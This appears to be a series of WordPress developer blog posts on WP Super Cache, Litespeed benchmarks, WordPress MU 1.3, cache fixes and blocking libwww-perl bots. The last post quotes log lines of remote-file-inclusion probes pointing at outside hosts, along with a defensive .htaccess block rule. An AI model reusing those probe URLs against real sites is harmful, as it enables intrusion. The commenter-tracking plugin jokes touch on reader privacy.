WIP: Blog Voyeur and Custom Akismet screenshots

Here’s a sneak preview of some stuff I’m working on, besides WP Super Cache and WordPress MU.

First of all, there’s my Blog Voyeur plugin. It’s a visitor logging plugin like many others, but this one only records hits from users who have left comments here. The screenshot below is what you see in the backend listing page. I took out the names of the users for privacy reasons. So far the plugin has worked quite well, but I’m not sure yet if it will see the light of day. After discussing this with Mark he came up with some possible uses for it. Inventive fellow is he. Comments in brackets by me.

“When I made that post yesterday criticising Matt, I wondered if he would look at it. Well now I know he did… and because he didn’t comment he’s guilty…” (paranoid?)

Match your cookie thing with crazyegg 🙂 (excessive?)

Have a popup – “Hi Matt!” (annoying?)

See returning user, see no comments so send them an email asking for their views on the posts they did not comment on. (obsessive?)

voyeur-list-t.gif

I mentioned this second plugin already. It’s a modified version of Akismet. You can download it yourself if you want to play with it. If someone else wants to take it further feel free to. It’s all GPL code. I’m posting a screenshot because it’s amazing to see so much spam from one IP address in only a few days. Just goes to show what a good job Akismet does.

akismet numbers

A Simply Silly WordPress URL

I’m not sure why I noticed this protest sticker stuck to a lamp post on Patrick Street, Cork, but maybe it was the typo in the URL that triggered my subconscious. One thing I can be certain of is that WordPress.org is not taking sides in any conflict of any sort! GPL software can be used by anyone so long as they stick to the licence under which they received the software.

Silly Stupid Typo

As expected, palestinesolidarityproject.wordpress.com points at an old blog of theirs as they have now moved to their own server at palestinesolidarityproject.org.

Glossing over the .org mistake for a minute, why do people still put the “www.” in front of long-winded URLs? It gets stripped by WordPress.com anyway. Why not put “http://” there instead? Makes more sense to me. Three cheers for the no-www movement!

So, have you seen any glaring typos on posters, fliers, stickers or blogs that made you look twice? Today’s link post doesn’t count. I did that on purpose to make a point. Sure. 🙂

100,000 page views in 5 minutes

Now, that’s why you can’t believe benchmarks. Sure, this server was able to serve 100,000 page views in 282 seconds but:

  • Requests were made from a VPS in the same datacenter. No need to worry about slow clients, or maintaining network connections to many remote clients.
  • I used Litespeed Web Server instead of Apache.
  • Was it realistic? Even a digg that sends you, say, 8,000 page views in an hour isn’t going to exercise your server that much unless your page is chock full of graphics, CSS and JavaScript. (oh wait, web 2.0 ..)
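To put those two figures side by side, here is a quick back-of-the-envelope calculation in Python. It only uses the numbers quoted above (100,000 page views in 282 seconds, and the example of 8,000 page views in an hour). The function name is my own and it assumes traffic is spread evenly, which real traffic never is.

```python
def requests_per_second(page_views, seconds):
    """Average request rate, assuming the views are spread evenly."""
    return page_views / seconds

benchmark_rate = requests_per_second(100_000, 282)  # the benchmark run
digg_rate = requests_per_second(8_000, 60 * 60)     # the example Digg hour

print(f"benchmark: {benchmark_rate:.0f} req/s")
print(f"digg hour: {digg_rate:.1f} req/s")
print(f"ratio:     {benchmark_rate / digg_rate:.0f}x")
```

That works out at roughly 355 requests per second for the benchmark against a little over 2 per second for the Digg example, a difference of about 160 times.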

So, is Litespeed’s webserver the one to go for? Maybe not. I can’t for the life of me get compression of the static cache working. When I do, the browser tries to display the gzipped data directly. I can enable the webserver’s gzip function but from my tests I don’t think it caches the resulting gzipped file. (By the way, mod_deflate, the Apache2 module that does the same thing, suffers from this problem too!) Later: I tested this again, and Litespeed allows you to set a gzip cache directory. For normal traffic it’s worth doing so pages load faster.
The mod_gzip site is a great resource if you want to find out more about compressing HTTP content.

How did Apache cope? I was serving 100 concurrent requests and Apache didn’t cope too well. It did serve all the file requests eventually but the load average jumped to just over 50 and the site was unavailable to anyone else. It’ll serve 1000 requests for a static file fine, even 10,000 too, but under constant load the server starts to wilt. Unless you have the RAM to keep enough Apache child processes going all the time you’re going to start swapping.
Meanwhile, Litespeed hardly caused a blip in the server’s load average. I’m quite impressed and I’m running it now. It’s also what powers WordPress.com. Even if you’re not using WordPress, you should look at alternatives to Apache.

This leads me nicely on to announce WP Super Cache 0.4! Download it here!

Major new features include:

  • A “lock down” button. I like to think of this as my “Digg Proof” button. This basically prepares your site for a heavy digging or slashdotting. It locks down the static cache files and doesn’t delete them when a new comment is made.
  • Automatic updating of your .htaccess file. (Back up your .htaccess before installing the plugin!)
  • Don’t super cache any request with GET parameters. You really need to use fancy permalinks now.
  • WordPress search works again.
  • Better version checking of wp-cache-config.php and advanced-cache.php in case you’re using an old one.
  • Better support for Microsoft Windows.
  • Properly serve cached static files on Red Hat/CentOS systems or others that have an entry for gzip in /etc/mime.types.
  • The Reject URI function works again and now uses regular expressions!
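As a rough illustration of the GET parameter and Reject URI items, the decision can be sketched like this. It is written in Python rather than the plugin’s PHP, and the function name and the sample patterns are made up for the example; it is not the plugin’s actual code.

```python
import re
from urllib.parse import urlsplit

def should_super_cache(url, rejected_patterns):
    """Return True if a request looks safe to serve from the static cache."""
    parts = urlsplit(url)
    # Any query string (?p=123, ?s=search terms) means the page is dynamic.
    if parts.query:
        return False
    # Reject URIs are treated as regular expressions matched against the path.
    return not any(re.search(pattern, parts.path) for pattern in rejected_patterns)

# Hypothetical reject list, for illustration only.
rejected = [r"^/wp-", r"\.php$"]

print(should_super_cache("/2007/11/05/wordpress-super-cache-01/", rejected))
print(should_super_cache("/?s=cache", rejected))
print(should_super_cache("/wp-admin/", rejected))
```

Only the first request qualifies. Under this model a search such as /?s=cache always skips the static cache because of its query string, and a blog using ?p=123 style links would never be super cached, hence the advice to use fancy permalinks.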

Support queries should go to the forum. Make sure your posts are tagged “wp-super-cache”; if you post from that link they will be.

How well did Super Cache handle the digg?

I must admit making the front page of Digg.com wasn’t the nail biting experience I expected.

$ grep "GET /2007/11/05/wordpress-super-cache-01/" access.log.1|grep digg -c
4686
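If you would rather do the same count in a script, here is a minimal Python sketch of what the two greps do. The log lines are invented sample data (not taken from my server), and the function name is hypothetical.

```python
def count_hits(lines, request, hint):
    """Count lines containing both substrings, like `grep request | grep -c hint`."""
    return sum(1 for line in lines if request in line and hint in line)

# Invented sample lines in combined log format, for illustration only.
sample_log = [
    '192.0.2.1 - - [06/Nov/2007:10:00:00 +0000] "GET /2007/11/05/wordpress-super-cache-01/ HTTP/1.1" 200 1234 "http://digg.com/" "Mozilla/5.0"',
    '192.0.2.2 - - [06/Nov/2007:10:00:01 +0000] "GET /2007/11/05/wordpress-super-cache-01/ HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '192.0.2.3 - - [06/Nov/2007:10:00:02 +0000] "GET /about/ HTTP/1.1" 200 900 "http://digg.com/" "Mozilla/5.0"',
]

print(count_hits(sample_log, "GET /2007/11/05/wordpress-super-cache-01/", "digg"))
```

Like the grep version, this matches “digg” anywhere in the line, so it counts requests rather than unique visitors and would also pick up the word in a user agent or query string.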

digg.com

My Super Cache announcement only drew 4686 visitors which is an ultra-light Digg. The Digg page for the post received 808 diggs as of a few minutes ago which is great. Thank you for voting! Judging by the sheer number of comments on that post, there’s a lot of interest out there in the plugin.
What about traffic graphs? The spike at the end of the first graph is my nightly BackupPC service kicking in. The second is from Google Analytics. My server could certainly handle a lot more traffic!

digg.com traffic
analytics-digg

A quick look at my uptime shows the server hardly broke a sweat dealing with the extra traffic except where some idiot spammer bots tried to download my archives a few times. Unfortunately the first time that happened the archives weren’t cached and the load climbed.

For maximum performance, download Xcache and install it. The Xcache WordPress plugin uses Xcache to cache data structures and makes WordPress much faster, even if you don’t use any other caching tool.

WordPress Super Cache 0.1

It’s time to lift the veil of secrecy on my latest project. With help from friends who diligently tested and reported bugs on this I can now present version 0.1 of WP Super Cache!

It is an extensive modification of the famous WP-Cache 2 plugin by Ricardo Galli Granada. This plugin creates static html files that are served directly by the webserver as well as the usual WP-Cache data files. It also goes one step further fixing a couple of bugs, adding some hooks and new features and making WP-Cache more flexible.
From the plugin page, here are some of the major changes and updates:

  • A plugin and hooks system. A common complaint with WP-Cache was that hacking was required to make it work nicely with other plugins. Now you can take advantage of the simple plugin system built in to change how or when pages are cached. Use do_cacheaction() and add_cacheaction() like you would with WordPress hooks. Plugins can add their own options to the admin page too.
  • Works well with WordPress MU in VHOST or non-VHOST configuration. Each blog’s cache files are identified to improve performance.
  • Normal WP-Cache files are now split in two. Meta files go in their own directory making it much faster to scan and update the cache.
  • Includes this WP-Cache and protected posts fix.
  • Automatically disable gzip compression in WordPress instead of dying.
  • As Akismet and other spam fighting tools have improved, the cache will only be invalidated if a comment is definitely not spam.
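For anyone who hasn’t used WordPress-style hooks, the idea behind add_cacheaction() and do_cacheaction() can be sketched in a few lines. This is a Python illustration of the pattern, not the plugin’s PHP code: I’m assuming each callback receives a value and returns the (possibly changed) value, the way WordPress filters do, and the hook name below is made up.

```python
# Registry of callbacks, keyed by action name.
_cache_actions = {}

def add_cacheaction(action, func):
    """Register a callback to run when `action` fires."""
    _cache_actions.setdefault(action, []).append(func)

def do_cacheaction(action, value=""):
    """Pass `value` through every callback registered for `action`, in order."""
    for func in _cache_actions.get(action, []):
        value = func(value)
    return value

# Hypothetical hook: a plugin appends a suffix to a cache key.
add_cacheaction("example_cache_key", lambda key: key + "-mobile")

print(do_cacheaction("example_cache_key", "index"))  # prints "index-mobile"
print(do_cacheaction("unused_action", "index"))      # prints "index"
```

The point of the design is that an action with no callbacks simply hands the value back unchanged, so the core code can call hooks everywhere without caring whether any plugin is listening.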

If your server is struggling to cope with the traffic your site gets this plugin could be just right for you. If your site regularly gets hit by spikes of traffic like a digging or slashdotting it’s definitely the right choice, and even for everyday use, you may very well notice your webserver is a little bit more responsive.

I contacted Ricardo last week and sent him an earlier copy of the plugin but I haven’t heard from him yet. I’d love to know what he thinks of my modifications!

Update! This post has been dugg, please digg it and we can really test the cache out!

Nov 6th: WP Super Cache 0.2 is out! I think all the bugs mentioned below are now fixed. I applied Tummbler’s patch (from Elliott and Reiner) that enables gzip compression of the WP-Cache data files and fixes feed content types.
Please note: PHP’s internal zlib compression must be disabled for this to work. Look in your php.ini for the zlib.output_compression and zlib.output_compression_level directives and comment them out by placing a “;” at the start of each line.

Check the plugin page above for the download link.

WordPress MU 1.3

Finally, after what seems like an age, the download page has been updated with the new WordPress MU 1.3 release.

WordPress MU is a multi-blog version of WordPress which runs on millions of blogs all over the world. The major blogging site WordPress.com uses it, as do many others.

This is a sync of WordPress 2.3.1 which includes native tagging support as well as many bug and security fixes.
WordPress MU specific features include:

  • Better admin controls for the signup page. It can be disabled in various ways.
  • Upload space functions have been fixed.
  • The signup form is now hidden from search engines which will help avoid certain types of spamming.
  • Profile page now allows you to select your primary blog.
  • Database tables are now UTF-8 from the start.
  • If you’re using virtual hosts, the main blog doesn’t live at /blog/ any more.
  • The WordPress importer now assigns posts to other users on a blog.
  • A taxonomy sync script is included in mu-plugins but commented out. It hasn’t been tested much but if your site has many hundreds of blogs it might be worth spending some time on a test server. Replicate normal traffic patterns and see if the server can cope with the upgrade process. If not, then look at the sync script, uncomment it and iterate over all your blogs with a script.

Developers – get_blog_option() will never return the string “falsevalue” again. That bug has been squished and it now returns the boolean value false.

This forum thread on the new release is worth watching. Any problems will surface there first.

Thanks to:
Everyone on the MU forums for your help in tracking down bugs.
ktlee and momo360modena for all your patches. They’re very welcome and a huge help.

Extensive documentation is being built up on the WordPress MU Codex by many people, including Martin Cleaver who bugged me about moving the docs from Trac and about telling everyone that documentation help is always needed.

What time is it WordPress?

Daylight Saving Time (DST) ended this morning in Ireland, the UK and many other parts of the world when the clocks went back 1 hour. The US follows next week from what I remember. If your server is using UTC time, go to Options->General in your blog, check the “Times in the weblog should differ by” textbox and adjust accordingly!

wordpress-time.png

Here’s a discussion on the WordPress.com forums about the issue from last year and I found this extend idea that has already been implemented in the Time Zone plugin, but it only works on UNIX-like systems and if you’re not using PHP’s safe mode.

PHP5 has the date_default_timezone_set function, but not enough hosts are using PHP5 to make that a universal choice. It would be nice if all this was done automatically, and hopefully that will happen eventually as more hosts adopt PHP5.
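Until then, the number for the “Times in the weblog should differ by” box has to be worked out by hand. Here is a small Python sketch of that calculation for Ireland and the UK. It assumes the current EU rule (summer time runs from 01:00 UTC on the last Sunday of March to 01:00 UTC on the last Sunday of October) and a winter offset of 0 hours; the function names are my own.

```python
from datetime import datetime, timedelta, timezone

def last_sunday_0100_utc(year, month):
    """01:00 UTC on the last Sunday of March or October (both have 31 days)."""
    day = datetime(year, month, 31, 1, 0, tzinfo=timezone.utc)
    while day.weekday() != 6:  # Monday is 0, Sunday is 6
        day -= timedelta(days=1)
    return day

def weblog_offset_hours(when_utc, winter_offset=0):
    """Hours to enter in the settings box for a server running on UTC."""
    summer_start = last_sunday_0100_utc(when_utc.year, 3)
    summer_end = last_sunday_0100_utc(when_utc.year, 10)
    in_summer_time = summer_start <= when_utc < summer_end
    return winter_offset + (1 if in_summer_time else 0)

saturday = datetime(2007, 10, 27, 12, 0, tzinfo=timezone.utc)
sunday = datetime(2007, 10, 28, 12, 0, tzinfo=timezone.utc)
print(weblog_offset_hours(saturday))  # prints 1
print(weblog_offset_hours(sunday))    # prints 0
```

A real timezone database handles rule changes and other regions as well, which is exactly why letting PHP5 do it would be nicer than hard-coding a rule like this.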

And don’t forget to check your other gadgets, especially digital cameras. I doubt many of them know anything about timezones!

Howto: WP-Cache and protected posts

If you use protected posts on your WordPress blog you may have noticed that WP-Cache doesn’t cache those password protected posts properly. I didn’t know this, but James Farmer did so I went looking and found a fix.

In the plugins/wp-cache/ directory, open wp-cache-phase1.php in your favourite text editor and look for the following line:

if (preg_match("/^wordpress|^comment_author_email_/", $key)) {

Replace that line with this one:

if (preg_match("/^wp-postpass|^wordpress|^comment_author_email_/", $key)) {

Save and upload the file if necessary and clear your cache. Password protected posts should be cached properly now!
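To see what the extra alternative in the pattern changes, here is the same regular expression tried against a couple of cookie names in Python. As I understand it, WP-Cache only takes cookies whose names match this pattern into account when deciding which cached copy to serve; the cookie names, the hash suffix and the helper function below are invented for the example.

```python
import re

OLD_PATTERN = re.compile(r"^wordpress|^comment_author_email_")
NEW_PATTERN = re.compile(r"^wp-postpass|^wordpress|^comment_author_email_")

def cookies_that_count(cookies, pattern):
    """Names of the cookies the cache would take into account."""
    return sorted(name for name in cookies if pattern.search(name))

# Hypothetical cookies sent by a visitor who has entered a post password.
cookies = {"wp-postpass_abc123": "secret", "some_tracker": "1"}

print(cookies_that_count(cookies, OLD_PATTERN))  # prints []
print(cookies_that_count(cookies, NEW_PATTERN))  # prints ['wp-postpass_abc123']
```

With the old pattern the post password cookie is invisible to the cache, so visitors with and without the password look identical to it. The new pattern lets the cache tell them apart.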

Ironically, this post wasn’t being cached by WP-Cache because the URL contains the string “wp-“. Here’s how to fix that bug. Open wp-cache-phase2.php and look for the following line:

if (strlen($expr) > 0 && strstr($uri, $expr))

Change it to read:

if (strlen($expr) > 0 && substr( $uri, 1, strlen($expr) ) == $expr )

Phew. This post is now cached.
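The difference between the two checks is easier to see side by side. This is a Python rendering of the two PHP conditions, with “wp-” as the rejected string and a made-up URI standing in for this post’s permalink.

```python
def rejected_old(uri, expr):
    """Old check: reject if expr appears anywhere in the URI (PHP strstr)."""
    return len(expr) > 0 and expr in uri

def rejected_new(uri, expr):
    """New check: reject only if expr follows the leading slash (PHP substr from offset 1)."""
    return len(expr) > 0 and uri[1:1 + len(expr)] == expr

post_uri = "/2007/10/howto-wp-cache-and-protected-posts/"  # hypothetical permalink
admin_uri = "/wp-admin/index.php"

print(rejected_old(post_uri, "wp-"), rejected_new(post_uri, "wp-"))    # prints True False
print(rejected_old(admin_uri, "wp-"), rejected_new(admin_uri, "wp-"))  # prints True True
```

The trade-off is that the new check only works for rejected strings at the very start of the path, so a WordPress install in a subdirectory would need the subdirectory included in the rejected string.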

Keep the libwww-perl bots out

If you look through your server logs you’ll probably notice more than a few requests like these:

GET //wp-pass.php?_wp_http_referer=http://148.245.107.2/.ssh/id.txt?? … “libwww-perl/5.805”
GET /2004/02/18/smoking-ban-is-on-the-way/trackback/ … “libwww-perl/5.805”
GET /2004/02/18/irish-car-tax-list/trackback/ … “libwww-perl/5.805”
GET /tag/php//tags.php?BBCodeFile=http://drpepper.gigacities.net/id.txt? … “libwww-perl/5.579”

If you do find them (grep libwww-perl access_log) then add the following code to your .htaccess file. On a WordPress site this file should already be there if you’re using fancy permalinks.

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} libwww-perl.*
RewriteRule .* - [F,L]

Change “RewriteBase /” to suit your own base directory.
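If you want to check what a rule like this will and won’t catch before touching your .htaccess, the matching logic is simple enough to mimic in Python. This is only a model of the RewriteCond test: an unanchored, case-sensitive regular expression applied to the User-Agent header, with a 403 Forbidden response on a match. The function name is made up.

```python
import re

BLOCKED_AGENT = re.compile(r"libwww-perl.*")

def status_for(user_agent):
    """HTTP status the rule would produce for a given User-Agent header."""
    return 403 if BLOCKED_AGENT.search(user_agent) else 200

print(status_for("libwww-perl/5.805"))  # prints 403
print(status_for("Mozilla/5.0"))        # prints 200
print(status_for("LIBWWW-PERL/5.805"))  # prints 200
```

The last line shows that the condition is case sensitive as written. Adding the [NC] flag to the RewriteCond line would make it match regardless of case.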

There are other bad guys out there. This page has a long list of rewrite rules to keep out all sorts of bots! I haven’t looked through them myself so YMMV if you try them.

This has the added benefit of reducing load on your server. WordPress sites are dynamically generated. This is great under normal circumstances but when you get a flood of requests it can place an unnecessary load on your site. WP-Cache helps a lot but these rules will stop them dead at the front door!

PS. ‘Course, if you depend on a libwww-perl application then don’t add this rule or you may give yourself a headache trying to figure out why things stopped working!